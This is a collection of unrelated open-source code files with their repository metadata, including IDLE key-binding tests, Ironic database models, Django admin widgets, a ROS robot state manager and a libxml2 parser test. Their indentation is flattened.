# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Organisation resolver."""
import jsonresolver
from invenio_pidstore.models import PersistentIdentifier, PIDStatus
@jsonresolver.route('/api/libraries/<pid>', host='ils.rero.ch')
def library_resolver(pid):
"""."""
persistent_id = PersistentIdentifier.get('lib', pid)
if persistent_id.status == PIDStatus.REGISTERED:
return dict(pid=persistent_id.pid_value)
raise Exception('unable to resolve')
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""Test config_key, coverage 98%.
Coverage is effectively 100%. Tkinter dialog is mocked, Mac-only line
may be skipped, and dummy function in bind test should not be called.
Not tested: exit with 'self.advanced or self.keys_ok(keys) ...' False.
"""
from idlelib import config_key
from test.support import requires
import unittest
from unittest import mock
from tkinter import Tk, TclError
from idlelib.idle_test.mock_idle import Func
from idlelib.idle_test.mock_tk import Mbox_func
class ValidationTest(unittest.TestCase):
"Test validation methods: ok, keys_ok, bind_ok."
class Validator(config_key.GetKeysFrame):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class list_keys_final:
get = Func()
self.list_keys_final = list_keys_final
get_modifiers = Func()
showerror = Mbox_func()
@classmethod
def setUpClass(cls):
requires('gui')
cls.root = Tk()
cls.root.withdraw()
keylist = [['<Key-F12>'], ['<Control-Key-x>', '<Control-Key-X>']]
cls.dialog = cls.Validator(cls.root, '<<Test>>', keylist)
@classmethod
def tearDownClass(cls):
del cls.dialog
cls.root.update_idletasks()
cls.root.destroy()
del cls.root
def setUp(self):
self.dialog.showerror.message = ''
# A test that needs a particular final key value should set it.
# A test that sets a non-blank modifier list should reset it to [].
def test_ok_empty(self):
self.dialog.key_string.set(' ')
self.dialog.ok()
self.assertEqual(self.dialog.result, '')
self.assertEqual(self.dialog.showerror.message, 'No key specified.')
def test_ok_good(self):
self.dialog.key_string.set('<Key-F11>')
self.dialog.list_keys_final.get.result = 'F11'
self.dialog.ok()
self.assertEqual(self.dialog.result, '<Key-F11>')
self.assertEqual(self.dialog.showerror.message, '')
def test_keys_no_ending(self):
self.assertFalse(self.dialog.keys_ok('<Control-Shift'))
self.assertIn('Missing the final', self.dialog.showerror.message)
def test_keys_no_modifier_bad(self):
self.dialog.list_keys_final.get.result = 'A'
self.assertFalse(self.dialog.keys_ok('<Key-A>'))
self.assertIn('No modifier', self.dialog.showerror.message)
def test_keys_no_modifier_ok(self):
self.dialog.list_keys_final.get.result = 'F11'
self.assertTrue(self.dialog.keys_ok('<Key-F11>'))
self.assertEqual(self.dialog.showerror.message, '')
def test_keys_shift_bad(self):
self.dialog.list_keys_final.get.result = 'a'
self.dialog.get_modifiers.result = ['Shift']
self.assertFalse(self.dialog.keys_ok('<a>'))
self.assertIn('shift modifier', self.dialog.showerror.message)
self.dialog.get_modifiers.result = []
def test_keys_dup(self):
for mods, final, seq in (([], 'F12', '<Key-F12>'),
(['Control'], 'x', '<Control-Key-x>'),
(['Control'], 'X', '<Control-Key-X>')):
with self.subTest(m=mods, f=final, s=seq):
self.dialog.list_keys_final.get.result = final
self.dialog.get_modifiers.result = mods
self.assertFalse(self.dialog.keys_ok(seq))
self.assertIn('already in use', self.dialog.showerror.message)
self.dialog.get_modifiers.result = []
def test_bind_ok(self):
self.assertTrue(self.dialog.bind_ok('<Control-Shift-Key-a>'))
self.assertEqual(self.dialog.showerror.message, '')
def test_bind_not_ok(self):
self.assertFalse(self.dialog.bind_ok('<Control-Shift>'))
self.assertIn('not accepted', self.dialog.showerror.message)
class ToggleLevelTest(unittest.TestCase):
"Test toggle between Basic and Advanced frames."
@classmethod
def setUpClass(cls):
requires('gui')
cls.root = Tk()
cls.root.withdraw()
cls.dialog = config_key.GetKeysFrame(cls.root, '<<Test>>', [])
@classmethod
def tearDownClass(cls):
del cls.dialog
cls.root.update_idletasks()
cls.root.destroy()
del cls.root
def test_toggle_level(self):
dialog = self.dialog
def stackorder():
"""Get the stack order of the children of the frame.
winfo_children() stores the children in stack order, so
this can be used to check whether a frame is above or
below another one.
"""
for index, child in enumerate(dialog.winfo_children()):
if child._name == 'keyseq_basic':
basic = index
if child._name == 'keyseq_advanced':
advanced = index
return basic, advanced
# New window starts at basic level.
self.assertFalse(dialog.advanced)
self.assertIn('Advanced', dialog.button_level['text'])
basic, advanced = stackorder()
self.assertGreater(basic, advanced)
# Toggle to advanced.
dialog.toggle_level()
self.assertTrue(dialog.advanced)
self.assertIn('Basic', dialog.button_level['text'])
basic, advanced = stackorder()
self.assertGreater(advanced, basic)
# Toggle to basic.
dialog.button_level.invoke()
self.assertFalse(dialog.advanced)
self.assertIn('Advanced', dialog.button_level['text'])
basic, advanced = stackorder()
self.assertGreater(basic, advanced)
class KeySelectionTest(unittest.TestCase):
"Test selecting key on Basic frames."
class Basic(config_key.GetKeysFrame):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class list_keys_final:
get = Func()
select_clear = Func()
yview = Func()
self.list_keys_final = list_keys_final
def set_modifiers_for_platform(self):
self.modifiers = ['foo', 'bar', 'BAZ']
self.modifier_label = {'BAZ': 'ZZZ'}
showerror = Mbox_func()
@classmethod
def setUpClass(cls):
requires('gui')
cls.root = Tk()
cls.root.withdraw()
cls.dialog = cls.Basic(cls.root, '<<Test>>', [])
@classmethod
def tearDownClass(cls):
del cls.dialog
cls.root.update_idletasks()
cls.root.destroy()
del cls.root
def setUp(self):
self.dialog.clear_key_seq()
def test_get_modifiers(self):
dialog = self.dialog
gm = dialog.get_modifiers
eq = self.assertEqual
# Modifiers are set on/off by invoking the checkbutton.
dialog.modifier_checkbuttons['foo'].invoke()
eq(gm(), ['foo'])
dialog.modifier_checkbuttons['BAZ'].invoke()
eq(gm(), ['foo', 'BAZ'])
dialog.modifier_checkbuttons['foo'].invoke()
eq(gm(), ['BAZ'])
@mock.patch.object(config_key.GetKeysFrame, 'get_modifiers')
def test_build_key_string(self, mock_modifiers):
dialog = self.dialog
key = dialog.list_keys_final
string = dialog.key_string.get
eq = self.assertEqual
key.get.result = 'a'
mock_modifiers.return_value = []
dialog.build_key_string()
eq(string(), '<Key-a>')
mock_modifiers.return_value = ['mymod']
dialog.build_key_string()
eq(string(), '<mymod-Key-a>')
key.get.result = ''
mock_modifiers.return_value = ['mymod', 'test']
dialog.build_key_string()
eq(string(), '<mymod-test>')
@mock.patch.object(config_key.GetKeysFrame, 'get_modifiers')
def test_final_key_selected(self, mock_modifiers):
dialog = self.dialog
key = dialog.list_keys_final
string = dialog.key_string.get
eq = self.assertEqual
mock_modifiers.return_value = ['Shift']
key.get.result = '{'
dialog.final_key_selected()
eq(string(), '<Shift-Key-braceleft>')
class CancelWindowTest(unittest.TestCase):
"Simulate user clicking [Cancel] button."
@classmethod
def setUpClass(cls):
requires('gui')
cls.root = Tk()
cls.root.withdraw()
cls.dialog = config_key.GetKeysWindow(
cls.root, 'Title', '<<Test>>', [], _utest=True)
@classmethod
def tearDownClass(cls):
cls.dialog.cancel()
del cls.dialog
cls.root.update_idletasks()
cls.root.destroy()
del cls.root
@mock.patch.object(config_key.GetKeysFrame, 'ok')
def test_cancel(self, mock_frame_ok):
self.assertEqual(self.dialog.winfo_class(), 'Toplevel')
self.dialog.button_cancel.invoke()
with self.assertRaises(TclError):
self.dialog.winfo_class()
self.assertEqual(self.dialog.result, '')
mock_frame_ok.assert_not_called()
class OKWindowTest(unittest.TestCase):
"Simulate user clicking [OK] button."
@classmethod
def setUpClass(cls):
requires('gui')
cls.root = Tk()
cls.root.withdraw()
cls.dialog = config_key.GetKeysWindow(
cls.root, 'Title', '<<Test>>', [], _utest=True)
@classmethod
def tearDownClass(cls):
cls.dialog.cancel()
del cls.dialog
cls.root.update_idletasks()
cls.root.destroy()
del cls.root
@mock.patch.object(config_key.GetKeysFrame, 'ok')
def test_ok(self, mock_frame_ok):
self.assertEqual(self.dialog.winfo_class(), 'Toplevel')
self.dialog.button_ok.invoke()
with self.assertRaises(TclError):
self.dialog.winfo_class()
mock_frame_ok.assert_called()
class WindowResultTest(unittest.TestCase):
"Test window result get and set."
@classmethod
def setUpClass(cls):
requires('gui')
cls.root = Tk()
cls.root.withdraw()
cls.dialog = config_key.GetKeysWindow(
cls.root, 'Title', '<<Test>>', [], _utest=True)
@classmethod
def tearDownClass(cls):
cls.dialog.cancel()
del cls.dialog
cls.root.update_idletasks()
cls.root.destroy()
del cls.root
def test_result(self):
dialog = self.dialog
eq = self.assertEqual
dialog.result = ''
eq(dialog.result, '')
eq(dialog.frame.result,'')
dialog.result = 'bar'
eq(dialog.result,'bar')
eq(dialog.frame.result,'bar')
dialog.frame.result = 'foo'
eq(dialog.result, 'foo')
eq(dialog.frame.result,'foo')
class HelperTest(unittest.TestCase):
"Test module level helper functions."
def test_translate_key(self):
tr = config_key.translate_key
eq = self.assertEqual
# Letters return unchanged with no 'Shift'.
eq(tr('q', []), 'Key-q')
eq(tr('q', ['Control', 'Alt']), 'Key-q')
# 'Shift' uppercases single lowercase letters.
eq(tr('q', ['Shift']), 'Key-Q')
eq(tr('q', ['Control', 'Shift']), 'Key-Q')
eq(tr('q', ['Control', 'Alt', 'Shift']), 'Key-Q')
# Convert key name to keysym.
eq(tr('Page Up', []), 'Key-Prior')
# 'Shift' doesn't change case when it's not a single char.
eq(tr('*', ['Shift']), 'Key-asterisk')
if __name__ == '__main__':
unittest.main(verbosity=2)
|
python
|
github
|
https://github.com/python/cpython
|
Lib/idlelib/idle_test/test_config_key.py
|
# frozen_string_literal: true
require "test_helper"
class ActionMailbox::IncinerationJobTest < ActiveJob::TestCase
setup { @inbound_email = create_inbound_email_from_fixture("welcome.eml") }
test "ignoring a missing inbound email" do
@inbound_email.destroy!
perform_enqueued_jobs do
assert_nothing_raised do
ActionMailbox::IncinerationJob.perform_later @inbound_email
end
end
end
end
|
ruby
|
github
|
https://github.com/rails/rails
|
actionmailbox/test/jobs/incineration_job_test.rb
|
# -*- encoding: utf-8 -*-
#
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
SQLAlchemy models for baremetal data.
"""
import json
from oslo_config import cfg
from oslo_db import options as db_options
from oslo_db.sqlalchemy import models
import six.moves.urllib.parse as urlparse
from sqlalchemy import Boolean, Column, DateTime
from sqlalchemy import ForeignKey, Integer
from sqlalchemy import schema, String, Text
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.types import TypeDecorator, TEXT
from ironic.common import paths
sql_opts = [
cfg.StrOpt('mysql_engine',
default='InnoDB',
help='MySQL engine to use.')
]
_DEFAULT_SQL_CONNECTION = 'sqlite:///' + paths.state_path_def('ironic.sqlite')
cfg.CONF.register_opts(sql_opts, 'database')
db_options.set_defaults(cfg.CONF, _DEFAULT_SQL_CONNECTION, 'ironic.sqlite')
def table_args():
engine_name = urlparse.urlparse(cfg.CONF.database.connection).scheme
if engine_name == 'mysql':
return {'mysql_engine': cfg.CONF.database.mysql_engine,
'mysql_charset': "utf8"}
return None
class JsonEncodedType(TypeDecorator):
"""Abstract base type serialized as json-encoded string in db."""
type = None
impl = TEXT
def process_bind_param(self, value, dialect):
if value is None:
# Save default value according to current type to keep the
# interface the consistent.
value = self.type()
elif not isinstance(value, self.type):
raise TypeError("%s supposes to store %s objects, but %s given"
% (self.__class__.__name__,
self.type.__name__,
type(value).__name__))
serialized_value = json.dumps(value)
return serialized_value
def process_result_value(self, value, dialect):
if value is not None:
value = json.loads(value)
return value
class JSONEncodedDict(JsonEncodedType):
"""Represents dict serialized as json-encoded string in db."""
type = dict
class JSONEncodedList(JsonEncodedType):
"""Represents list serialized as json-encoded string in db."""
type = list
class IronicBase(models.TimestampMixin,
models.ModelBase):
metadata = None
def as_dict(self):
d = {}
for c in self.__table__.columns:
d[c.name] = self[c.name]
return d
def save(self, session=None):
import ironic.db.sqlalchemy.api as db_api
if session is None:
session = db_api.get_session()
super(IronicBase, self).save(session)
Base = declarative_base(cls=IronicBase)
class Chassis(Base):
"""Represents a hardware chassis."""
__tablename__ = 'chassis'
__table_args__ = (
schema.UniqueConstraint('uuid', name='uniq_chassis0uuid'),
table_args()
)
id = Column(Integer, primary_key=True)
uuid = Column(String(36))
extra = Column(JSONEncodedDict)
description = Column(String(255), nullable=True)
class Conductor(Base):
"""Represents a conductor service entry."""
__tablename__ = 'conductors'
__table_args__ = (
schema.UniqueConstraint('hostname', name='uniq_conductors0hostname'),
table_args()
)
id = Column(Integer, primary_key=True)
hostname = Column(String(255), nullable=False)
drivers = Column(JSONEncodedList)
online = Column(Boolean, default=True)
class Node(Base):
"""Represents a bare metal node."""
__tablename__ = 'nodes'
__table_args__ = (
schema.UniqueConstraint('uuid', name='uniq_nodes0uuid'),
schema.UniqueConstraint('instance_uuid',
name='uniq_nodes0instance_uuid'),
schema.UniqueConstraint('name', name='uniq_nodes0name'),
table_args())
id = Column(Integer, primary_key=True)
uuid = Column(String(36))
# NOTE(deva): we store instance_uuid directly on the node so that we can
# filter on it more efficiently, even though it is
# user-settable, and would otherwise be in node.properties.
instance_uuid = Column(String(36), nullable=True)
name = Column(String(255), nullable=True)
chassis_id = Column(Integer, ForeignKey('chassis.id'), nullable=True)
power_state = Column(String(15), nullable=True)
target_power_state = Column(String(15), nullable=True)
provision_state = Column(String(15), nullable=True)
target_provision_state = Column(String(15), nullable=True)
provision_updated_at = Column(DateTime, nullable=True)
last_error = Column(Text, nullable=True)
instance_info = Column(JSONEncodedDict)
properties = Column(JSONEncodedDict)
driver = Column(String(15))
driver_info = Column(JSONEncodedDict)
driver_internal_info = Column(JSONEncodedDict)
clean_step = Column(JSONEncodedDict)
# NOTE(deva): this is the host name of the conductor which has
# acquired a TaskManager lock on the node.
# We should use an INT FK (conductors.id) in the future.
reservation = Column(String(255), nullable=True)
# NOTE(deva): this is the id of the last conductor which prepared local
# state for the node (eg, a PXE config file).
# When affinity and the hash ring's mapping do not match,
# this indicates that a conductor should rebuild local state.
conductor_affinity = Column(Integer,
ForeignKey('conductors.id',
name='nodes_conductor_affinity_fk'),
nullable=True)
maintenance = Column(Boolean, default=False)
maintenance_reason = Column(Text, nullable=True)
console_enabled = Column(Boolean, default=False)
inspection_finished_at = Column(DateTime, nullable=True)
inspection_started_at = Column(DateTime, nullable=True)
extra = Column(JSONEncodedDict)
class Port(Base):
"""Represents a network port of a bare metal node."""
__tablename__ = 'ports'
__table_args__ = (
schema.UniqueConstraint('address', name='uniq_ports0address'),
schema.UniqueConstraint('uuid', name='uniq_ports0uuid'),
table_args())
id = Column(Integer, primary_key=True)
uuid = Column(String(36))
address = Column(String(18))
node_id = Column(Integer, ForeignKey('nodes.id'), nullable=True)
extra = Column(JSONEncodedDict)
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.connect.data;
import org.apache.kafka.connect.errors.DataException;
import org.junit.jupiter.api.Test;
import java.util.Calendar;
import java.util.GregorianCalendar;
import java.util.TimeZone;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertThrows;
public class DateTest {
private static final GregorianCalendar EPOCH;
private static final GregorianCalendar EPOCH_PLUS_TEN_THOUSAND_DAYS;
private static final GregorianCalendar EPOCH_PLUS_TIME_COMPONENT;
static {
EPOCH = new GregorianCalendar(1970, Calendar.JANUARY, 1, 0, 0, 0);
EPOCH.setTimeZone(TimeZone.getTimeZone("UTC"));
EPOCH_PLUS_TIME_COMPONENT = new GregorianCalendar(1970, Calendar.JANUARY, 1, 0, 0, 1);
EPOCH_PLUS_TIME_COMPONENT.setTimeZone(TimeZone.getTimeZone("UTC"));
EPOCH_PLUS_TEN_THOUSAND_DAYS = new GregorianCalendar(1970, Calendar.JANUARY, 1, 0, 0, 0);
EPOCH_PLUS_TEN_THOUSAND_DAYS.setTimeZone(TimeZone.getTimeZone("UTC"));
EPOCH_PLUS_TEN_THOUSAND_DAYS.add(Calendar.DATE, 10000);
}
@Test
public void testBuilder() {
Schema plain = Date.SCHEMA;
assertEquals(Date.LOGICAL_NAME, plain.name());
assertEquals(1, (Object) plain.version());
}
@Test
public void testFromLogical() {
assertEquals(0, Date.fromLogical(Date.SCHEMA, EPOCH.getTime()));
assertEquals(10000, Date.fromLogical(Date.SCHEMA, EPOCH_PLUS_TEN_THOUSAND_DAYS.getTime()));
}
@Test
public void testFromLogicalInvalidSchema() {
assertThrows(DataException.class,
() -> Date.fromLogical(Date.builder().name("invalid").build(), EPOCH.getTime()));
}
@Test
public void testFromLogicalInvalidHasTimeComponents() {
assertThrows(DataException.class,
() -> Date.fromLogical(Date.SCHEMA, EPOCH_PLUS_TIME_COMPONENT.getTime()));
}
@Test
public void testToLogical() {
assertEquals(EPOCH.getTime(), Date.toLogical(Date.SCHEMA, 0));
assertEquals(EPOCH_PLUS_TEN_THOUSAND_DAYS.getTime(), Date.toLogical(Date.SCHEMA, 10000));
}
@Test
public void testToLogicalInvalidSchema() {
assertThrows(DataException.class,
() -> Date.toLogical(Date.builder().name("invalid").build(), 0));
}
}
|
java
|
github
|
https://github.com/apache/kafka
|
connect/api/src/test/java/org/apache/kafka/connect/data/DateTest.java
|
# frozen_string_literal: true
class PrefixedJob < ActiveJob::Base
self.queue_name_prefix = "production"
def perform; end
end
|
ruby
|
github
|
https://github.com/rails/rails
|
activejob/test/jobs/prefixed_job.rb
|
"""
Form Widget classes specific to the Django admin site.
"""
from itertools import chain
from django import forms
from django.forms.widgets import RadioFieldRenderer, RadioChoiceInput
from django.utils.encoding import force_str
from django.utils.safestring import mark_safe
from django.utils.html import conditional_escape
from django.utils.translation import ugettext as _
from util import vendor
class AdminDateWidget(forms.DateInput):
@property
def media(self):
return vendor('datepicker.js', 'datepicker.css', 'xadmin.widget.datetime.js')
def __init__(self, attrs=None, format=None):
final_attrs = {'class': 'date-field', 'size': '10'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminDateWidget, self).__init__(attrs=final_attrs, format=format)
def render(self, name, value, attrs=None):
input_html = super(AdminDateWidget, self).render(name, value, attrs)
return mark_safe('<div class="input-group date bootstrap-datepicker"><span class="input-group-addon"><i class="fa fa-calendar"></i></span>%s'
'<span class="input-group-btn"><button class="btn btn-default" type="button">%s</button></span></div>' % (input_html, _(u'Today')))
class AdminTimeWidget(forms.TimeInput):
@property
def media(self):
return vendor('datepicker.js','timepicker.js', 'timepicker.css', 'xadmin.widget.datetime.js')
def __init__(self, attrs=None, format=None):
final_attrs = {'class': 'time-field', 'size': '8'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminTimeWidget, self).__init__(attrs=final_attrs, format=format)
def render(self, name, value, attrs=None):
input_html = super(AdminTimeWidget, self).render(name, value, attrs)
return mark_safe('<div class="input-group time bootstrap-timepicker"><span class="input-group-addon"><i class="fa fa-clock-o">'
'</i></span>%s<span class="input-group-btn"><button class="btn btn-default" type="button">%s</button></span></div>' % (input_html, _(u'Now')))
class AdminSelectWidget(forms.Select):
@property
def media(self):
return vendor('select.js', 'select.css', 'xadmin.widget.select.js')
class AdminSplitDateTime(forms.SplitDateTimeWidget):
"""
A SplitDateTime Widget that has some admin-specific styling.
"""
def __init__(self, attrs=None):
widgets = [AdminDateWidget, AdminTimeWidget]
# Note that we're calling MultiWidget, not SplitDateTimeWidget, because
# we want to define widgets.
forms.MultiWidget.__init__(self, widgets, attrs)
def format_output(self, rendered_widgets):
return mark_safe(u'<div class="datetime clearfix">%s%s</div>' %
(rendered_widgets[0], rendered_widgets[1]))
class AdminRadioInput(RadioChoiceInput):
def render(self, name=None, value=None, attrs=None, choices=()):
name = name or self.name
value = value or self.value
attrs = attrs or self.attrs
attrs['class'] = attrs.get('class', '').replace('form-control', '')
if 'id' in self.attrs:
label_for = ' for="%s_%s"' % (self.attrs['id'], self.index)
else:
label_for = ''
choice_label = conditional_escape(force_str(self.choice_label))
if attrs.get('inline', False):
return mark_safe(u'<label%s class="radio-inline">%s %s</label>' % (label_for, self.tag(), choice_label))
else:
return mark_safe(u'<div class="radio"><label%s>%s %s</label></div>' % (label_for, self.tag(), choice_label))
class AdminRadioFieldRenderer(RadioFieldRenderer):
def __iter__(self):
for i, choice in enumerate(self.choices):
yield AdminRadioInput(self.name, self.value, self.attrs.copy(), choice, i)
def __getitem__(self, idx):
choice = self.choices[idx] # Let the IndexError propogate
return AdminRadioInput(self.name, self.value, self.attrs.copy(), choice, idx)
def render(self):
return mark_safe(u'\n'.join([force_str(w) for w in self]))
class AdminRadioSelect(forms.RadioSelect):
renderer = AdminRadioFieldRenderer
class AdminCheckboxSelect(forms.CheckboxSelectMultiple):
def render(self, name, value, attrs=None, choices=()):
if value is None:
value = []
has_id = attrs and 'id' in attrs
final_attrs = self.build_attrs(attrs, name=name)
output = []
# Normalize to strings
str_values = set([force_str(v) for v in value])
for i, (option_value, option_label) in enumerate(chain(self.choices, choices)):
# If an ID attribute was given, add a numeric index as a suffix,
# so that the checkboxes don't all have the same ID attribute.
if has_id:
final_attrs = dict(final_attrs, id='%s_%s' % (attrs['id'], i))
label_for = u' for="%s"' % final_attrs['id']
else:
label_for = ''
cb = forms.CheckboxInput(
final_attrs, check_test=lambda value: value in str_values)
option_value = force_str(option_value)
rendered_cb = cb.render(name, option_value)
option_label = conditional_escape(force_str(option_label))
if final_attrs.get('inline', False):
output.append(u'<label%s class="checkbox-inline">%s %s</label>' % (label_for, rendered_cb, option_label))
else:
output.append(u'<div class="checkbox"><label%s>%s %s</label></div>' % (label_for, rendered_cb, option_label))
return mark_safe(u'\n'.join(output))
class AdminSelectMultiple(forms.SelectMultiple):
def __init__(self, attrs=None):
final_attrs = {'class': 'select-multi'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminSelectMultiple, self).__init__(attrs=final_attrs)
class AdminFileWidget(forms.ClearableFileInput):
template_with_initial = (u'<p class="file-upload">%s</p>'
% forms.ClearableFileInput.template_with_initial)
template_with_clear = (u'<span class="clearable-file-input">%s</span>'
% forms.ClearableFileInput.template_with_clear)
class AdminTextareaWidget(forms.Textarea):
def __init__(self, attrs=None):
final_attrs = {'class': 'textarea-field'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminTextareaWidget, self).__init__(attrs=final_attrs)
class AdminTextInputWidget(forms.TextInput):
def __init__(self, attrs=None):
final_attrs = {'class': 'text-field'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminTextInputWidget, self).__init__(attrs=final_attrs)
class AdminURLFieldWidget(forms.TextInput):
def __init__(self, attrs=None):
final_attrs = {'class': 'url-field'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminURLFieldWidget, self).__init__(attrs=final_attrs)
class AdminIntegerFieldWidget(forms.TextInput):
def __init__(self, attrs=None):
final_attrs = {'class': 'int-field'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminIntegerFieldWidget, self).__init__(attrs=final_attrs)
class AdminCommaSeparatedIntegerFieldWidget(forms.TextInput):
def __init__(self, attrs=None):
final_attrs = {'class': 'sep-int-field'}
if attrs is not None:
final_attrs.update(attrs)
super(AdminCommaSeparatedIntegerFieldWidget,
self).__init__(attrs=final_attrs)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
import rospy, os
from std_msgs.msg import String
from std_msgs.msg import Bool
mapping = False
navigation = False
autonomous = False
manual = False
motion_detection = False
capture = False
submit = False
command = "Standby"
sys_comm = ""
timer = 0.0
def command_parser(cmd):
global mapping, navigation, autonomous, manual, motion_detection, sys_comm, capture, timer, submit
last_cmd = command
if cmd == "map -m" and last_cmd == "Standby":
mapping = True
navigation = True
motion_detection = False
autonomous = False
manual = True
return "Manual Mapping"
if cmd == "map -a" and last_cmd == "Standby":
mapping = True
navigation = True
motion_detection = False
autonomous = True
manual = False
return "Autonomous Mapping"
if cmd == "map -s":
if mapping is True:
print("\nSAVING MAP...")
os.system("rosrun map_server map_saver -f /home/trevor/ROS/catkin_ws/src/asr/maps/asr_map && echo '\n'")
else:
print("\nERROR: MAP CAN ONLY BE SAVED WHILE THE MAPPING STATE IS ACTIVE")
return last_cmd
if cmd == "map -r":
if mapping is True:
print("\nRESETTING MAP...")
sys_comm = "reset"
else:
print("\nERROR: MAP CAN ONLY BE RESET WHILE THE MAPPING STATE IS ACTIVE")
return last_cmd
if cmd == "capture":
if motion_detection is True:
print("\nCAPTURING IMAGE FROM CAMERA...")
capture = True
timer = rospy.get_time()
else:
print("\nERROR: IMAGES CAN ONLY BE MANUALLY CAPTURED WHILE THE PATROL STATE IS ACTIVE")
capture = False
return last_cmd
if cmd == "submit_alerts -t":
submit = True
print "\nALERTS WILL BE EMAILED AND SAVED LOCALLY"
if cmd == "submit_alerts -f":
print "\nALERTS WILL NOT BE EMAILED BUT THEY WILL BE SAVED LOCALLY"
submit = False
if cmd == "patrol -m" and last_cmd == "Standby":
mapping = False
navigation = True
motion_detection = True
autonomous = False
manual = True
return "Manual Patrol"
if cmd == "patrol -a" and last_cmd == "Standby":
mapping = False
navigation = True
motion_detection = True
autonomous = True
manual = False
return "Autonomous Patrol"
if cmd == "standby":
mapping = False
navigation = False
motion_detection = False
autonomous = False
manual = False
return "Standby"
if cmd == "shutdown":
mapping = False
navigation = False
motion_detection = False
autonomous = False
manual = False
return "Shutdown"
if cmd == "help":
print("\n**************************** HELP ****************************\n")
print_usage()
return last_cmd
else:
print("\n************************ USAGE ERROR *************************\n")
print_usage()
return last_cmd
def print_state():
global mapping, motion_detection, autonomous, manual, command
print("\nCurrent State: " + str(command))
print(" Autonomous: " + str(autonomous))
print(" Manual: " + str(manual))
print(" Mapping: " + str(mapping))
print(" Navigation: " + str(navigation))
print(" Motion Detection: " + str(motion_detection))
def print_usage():
print("USAGE:")
print("1) User must execute 'standby' command before switching states")
print("2) User must enter only valid commands")
print(" Valid commands are:\n\tmap -m\n\tmap -a\n\tmap -s\n\tmap -r\n\tpatrol -m\n\tpatrol -a"
"\n\tsubmit_alerts -t\n\tsubmit_alerts -f\n\tstandby\n\tshutdown\n\thelp")
print("\n****************************************************************")
def shutdown_hook():
print("\n...SYSTEM SHUTTING DOWN...")
def state_manager():
global mapping, navigation, autonomous, manual, command, sys_comm, capture, timer, submit
rospy.init_node('state_manager', anonymous=False)
state_pub = rospy.Publisher('current_state', String, queue_size=10)
mapping_pub = rospy.Publisher('mapping_active', Bool, queue_size=10)
nav_pub = rospy.Publisher('nav_active', Bool, queue_size=10)
md_pub = rospy.Publisher('md_active', Bool, queue_size=10)
autonomous_pub = rospy.Publisher('autonomous_active', Bool, queue_size=10)
manual_pub = rospy.Publisher('manual_active', Bool, queue_size=10)
sys_pub = rospy.Publisher('syscommand', String, queue_size=10)
capture_pub = rospy.Publisher('cam_capture', Bool, queue_size=10)
submit_pub = rospy.Publisher('submit_alerts', Bool, queue_size=10)
rate = rospy.Rate(10) # 10hz
print("************************** ASR ONLINE **************************\n")
print_usage()
print_state()
while not rospy.is_shutdown():
command = command_parser(raw_input("\nasr$: "))
print_state()
state_pub.publish(command)
mapping_pub.publish(mapping)
nav_pub.publish(navigation)
md_pub.publish(motion_detection)
autonomous_pub.publish(autonomous)
manual_pub.publish(manual)
sys_pub.publish(sys_comm)
capture_pub.publish(capture)
submit_pub.publish(submit)
if capture is True:
time_since_capture = abs(rospy.get_time() - timer)
print "\nImages being captured, please wait..."
while not time_since_capture >= 3:
time_since_capture = abs(rospy.get_time() - timer)
print "\nImage capture complete!"
capture = False
capture_pub.publish(capture)
timer = 0.0
if command == "Shutdown":
rospy.signal_shutdown(shutdown_hook())
rate.sleep()
if __name__ == '__main__':
try:
state_manager()
except rospy.ROSInterruptException:
pass
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python -u
import sys
import libxml2
# Memory debug specific
libxml2.debugMemory(1)
log = ""
class callback:
def startDocument(self):
global log
log = log + "startDocument:"
def endDocument(self):
global log
log = log + "endDocument:"
def startElement(self, tag, attrs):
global log
log = log + "startElement %s %s:" % (tag, attrs)
def endElement(self, tag):
global log
log = log + "endElement %s:" % (tag)
def characters(self, data):
global log
log = log + "characters: %s:" % (data)
def warning(self, msg):
global log
log = log + "warning: %s:" % (msg)
def error(self, msg):
global log
log = log + "error: %s:" % (msg)
def fatalError(self, msg):
global log
log = log + "fatalError: %s:" % (msg)
handler = callback()
log=""
chunk="""<foo><bar2/>"""
ctxt = libxml2.createPushParser(handler, None, 0, "test.xml")
ctxt.parseChunk(chunk, len(chunk), 0)
ctxt=None
reference = "startDocument:startElement foo None:startElement bar2 None:endElement bar2:"
if log != reference:
print "Error got: %s" % log
print "Exprected: %s" % reference
sys.exit(1)
log=""
chunk="""<foo><bar2></bar2>"""
ctxt = libxml2.createPushParser(handler, None, 0, "test.xml")
ctxt.parseChunk(chunk, len(chunk), 0)
ctxt=None
reference = "startDocument:startElement foo None:startElement bar2 None:endElement bar2:"
if log != reference:
print "Error got: %s" % log
print "Exprected: %s" % reference
sys.exit(1)
log=""
chunk="""<foo><bar2>"""
